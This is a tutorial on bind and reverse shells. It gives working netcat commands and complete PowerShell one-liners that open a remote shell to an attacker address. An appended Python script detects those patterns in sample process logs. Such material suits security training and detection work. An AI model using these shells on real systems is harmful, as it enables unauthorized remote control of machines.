Remote Shell

Bind & Reverse Shell

I have personally found bind and reverse shells confusing, but with the right perspective it is not confusing at all.

There are two systems involved in this process: your system, from which the "hack" is initiated, let's call it the "hacker" (192.168.1.1), and the other system that falls "victim" (10.11.1.1), let's call it the "victim". In order for the hacker to gain a remote shell on the victim system, the hacker needs to establish a connection between the two. As we know, when a connection has to be established, one system has to be waiting to receive the connection and the other has to initiate it.

Bind Shell - When the hacker gets the victim to listen on a port and then initiates a connection from his system to the victim's system, it is a bind shell connection.

Reverse Shell - When the hacker gets his/her own system to listen on a port and then initiates a connection from the victim's system, it is a reverse shell connection.

Remote Shell using Netcat

Netcat is a popular tool to create remote shells when Linux machines are involved. The bind/reverse shell confusion kicks in when the commands have to be redirected to the shell of the respective operating system: whichever side runs the "-e" option is the side whose shell ends up attached to the connection.

Bind Shell using 2 Linux Systems

Victim

nc -nvlp 443 -e /bin/bash

Hacker

nc -nv 10.11.1.1 443

Reverse Shell using 2 Linux Systems

Hacker

nc -nvlp 443

Victim

nc -nv 192.168.1.1 443 -e /bin/bash

In the case of the victim's system being Windows, the execution option has to be "-e cmd.exe" instead of "-e /bin/bash".

Remote Shell using Powershell on Windows

PowerShell is a very powerful scripting language that is part of Windows since Windows 8. PowerShell commands can be used for creating remote shells, and this is a very popular method to gain control of a remote system.

Reverse Shell When Victim runs a Windows System

Hacker

nc -nvlp 443

Victim

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Bind Shell When Victim runs a Windows System

Victim

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

Hacker

nc -nv 10.11.1.1 443
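As an added example from the defender's side, not part of the original notes: a small Python script that classifies process-creation command lines into the bind and reverse shell patterns shown in the netcat and PowerShell sections above. The indicators it keys on are netcat's -e/-c (program handed to the connection) combined with -l (listen, hence bind) or a remote address (reverse), and PowerShell's TcpListener or TcpClient combined with iex/Invoke-Expression. The sample events are constructed, and the field names, host names and user names are assumptions chosen to resemble Sysmon Event ID 1 or auditd execve records.

```python
import os
import re

# Constructed sample process-creation records (not real telemetry). Field
# names mimic an EDR/Sysmon process-creation event; hosts/users are made up.
SAMPLE_EVENTS = [
    {"host": "victim-linux", "user": "www-data",
     "cmdline": "nc -nvlp 443 -e /bin/bash"},
    {"host": "victim-linux", "user": "www-data",
     "cmdline": "nc -nv 192.168.1.1 443 -e /bin/bash"},
    {"host": "victim-win", "user": "CORP\\jsmith",
     "cmdline": "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.1.1',443);"
                "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)\""},
    {"host": "victim-win", "user": "CORP\\jsmith",
     "cmdline": "powershell -c \"$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);"
                "$listener.start();$sendback = (iex $data 2>&1 | Out-String)\""},
    # Benign look-alikes that must not fire: a port check and an ordinary script.
    {"host": "build-01", "user": "ci", "cmdline": "nc -zv 10.0.0.5 22"},
    {"host": "admin-ws", "user": "ops", "cmdline": "powershell -c \"Get-Process | Out-String\""},
]

NC_NAMES = {"nc", "ncat", "netcat"}

# PowerShell indicators: a socket object plus expression evaluation of received data.
PS_CONNECT = re.compile(r"System\.Net\.Sockets\.TcpClient", re.IGNORECASE)
PS_LISTEN = re.compile(r"System\.Net\.Sockets\.TcpListener", re.IGNORECASE)
PS_EXEC = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE)
PS_PORT = re.compile(r"Tcp(?:Client|Listener)\('[^']*',\s*(\d{1,5})\)", re.IGNORECASE)


def classify_netcat(argv):
    """Return ('bind'|'reverse', port) when netcat hands a program to the
    connection (-e/-c/--exec/--sh-exec); any other netcat use returns None."""
    flags, long_opts = set(), set()
    for tok in argv[1:]:
        if tok.startswith("--"):
            long_opts.add(tok.split("=", 1)[0])
        elif tok.startswith("-") and len(tok) > 1:
            flags.update(tok[1:])          # combined short flags, e.g. -nvlp
    execs = bool(flags & {"e", "c"}) or bool(long_opts & {"--exec", "--sh-exec"})
    if not execs:
        return None
    listen = "l" in flags or "--listen" in long_opts
    ports = [t for t in argv[1:] if t.isdigit()]   # last bare number is the port
    port = int(ports[-1]) if ports else None
    return ("bind", port) if listen else ("reverse", port)


def classify_powershell(cmdline):
    """Return ('bind'|'reverse', port) for a PowerShell one-liner that both
    opens a TCP socket and evaluates what it reads; otherwise None."""
    if not PS_EXEC.search(cmdline):
        return None
    m = PS_PORT.search(cmdline)
    port = int(m.group(1)) if m else None
    if PS_LISTEN.search(cmdline):
        return ("bind", port)
    if PS_CONNECT.search(cmdline):
        return ("reverse", port)
    return None


def classify(cmdline):
    """Map one command line to ('bind'|'reverse', port) or None."""
    argv = cmdline.split()
    if not argv:
        return None
    exe = os.path.basename(argv[0]).lower().removesuffix(".exe")
    if exe in NC_NAMES:
        return classify_netcat(argv)
    if exe.startswith(("powershell", "pwsh")):
        return classify_powershell(cmdline)
    return None


def scan(events):
    """Run the classifier over a list of event dicts and return the findings."""
    findings = []
    for ev in events:
        verdict = classify(ev["cmdline"])
        if verdict:
            kind, port = verdict
            findings.append({"host": ev["host"], "user": ev["user"],
                             "kind": kind, "port": port})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']:<13} {f['user']:<12} {f['kind']:<8} shell on port {f['port']}")
```

The split between the two classifiers mirrors the confusion the notes describe: for netcat the listen flag decides the direction, while for PowerShell it is the choice of TcpListener versus TcpClient. Both rules only fire when received data is actually executed (netcat -e or PowerShell iex), so the port-check and the plain Get-Process script in the sample set are left alone.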
